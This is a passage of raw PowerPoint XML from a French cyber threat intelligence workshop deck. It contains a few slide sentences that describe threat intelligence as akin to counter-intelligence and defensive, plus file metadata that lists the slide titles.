                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>menace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> » y joue un rôle décisif.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Conceptuellement plus proche du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contre-espionnage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(« </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>counter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-intelligence ») et d’un </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>positionnement défensif. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4048447768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63602</TotalTime>
  <Words>2891</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Affichage à l'écran (4:3)</PresentationFormat>
  <Paragraphs>571</Paragraphs>
  <Slides>34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34</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="45" baseType="lpstr">
      <vt:lpstr>-apple-system</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Arial Unicode MS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Cyber threat intelligence workshop -part 1-</vt:lpstr>
      <vt:lpstr>CTI - les definitions</vt:lpstr>
      <vt:lpstr>Discours martial – pourquoi ?</vt:lpstr>
      <vt:lpstr>Discours martial – pourquoi ?</vt:lpstr>
      <vt:lpstr>Discours martial – pourquoi ?</vt:lpstr>
      <vt:lpstr>Discours martial – pourquoi ?</vt:lpstr>
      <vt:lpstr>Discours martial – pourquoi ?</vt:lpstr>
      <vt:lpstr>Discours martial – pourquoi ?</vt:lpstr>
      <vt:lpstr>Discours martial – pourquoi ?</vt:lpstr>
      <vt:lpstr>Definir la menace</vt:lpstr>
      <vt:lpstr>Definir la menace</vt:lpstr>
      <vt:lpstr>renseignements</vt:lpstr>
      <vt:lpstr>La collecte d’informations</vt:lpstr>
      <vt:lpstr>Typologie des cyber-renseignements</vt:lpstr>
      <vt:lpstr>CTI - le discours</vt:lpstr>
      <vt:lpstr>Environnement conflictuel</vt:lpstr>
      <vt:lpstr>Environnement cyber</vt:lpstr>
      <vt:lpstr>Cyber guerre</vt:lpstr>
      <vt:lpstr>DictionNaire CTI</vt:lpstr>
      <vt:lpstr>DictionNaire CTI</vt:lpstr>
      <vt:lpstr>CTI – l’exemple</vt:lpstr>
      <vt:lpstr>L’incident</vt:lpstr>
      <vt:lpstr>ANALYSE TACTIQUE – phase 1</vt:lpstr>
      <vt:lpstr>ANALYSE TACTIQUE – phase 1</vt:lpstr>
      <vt:lpstr>ANALYSE TACTIQUE – phase 2</vt:lpstr>
      <vt:lpstr>ANALYSE TACTIQUE – phase 2</vt:lpstr>
      <vt:lpstr>ANALYSE TACTIQUE – phase 2</vt:lpstr>
      <vt:lpstr>ANALYSE TACTIQUE – phase 2</vt:lpstr>
      <vt:lpstr>ANALYSE TACTIQUE – phase 2</vt:lpstr>
      <vt:lpstr>ANALYSE TACTIQUE – phase 3</vt:lpstr>
      <vt:lpstr>ANALYSE operationelle</vt:lpstr>
      <vt:lpstr>ANALYSE operationelle</vt:lpstr>
      <vt:lpstr>ANALYSE stratégique</vt:lpstr>
      <vt:lpstr>Qu'est-ce qu'un nom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20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-05-09T14:18:21Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-08T21:54:02Z</dcterms:modified>
  <cp:category>Templates</cp:category>
</cp:coreProperties>
</file>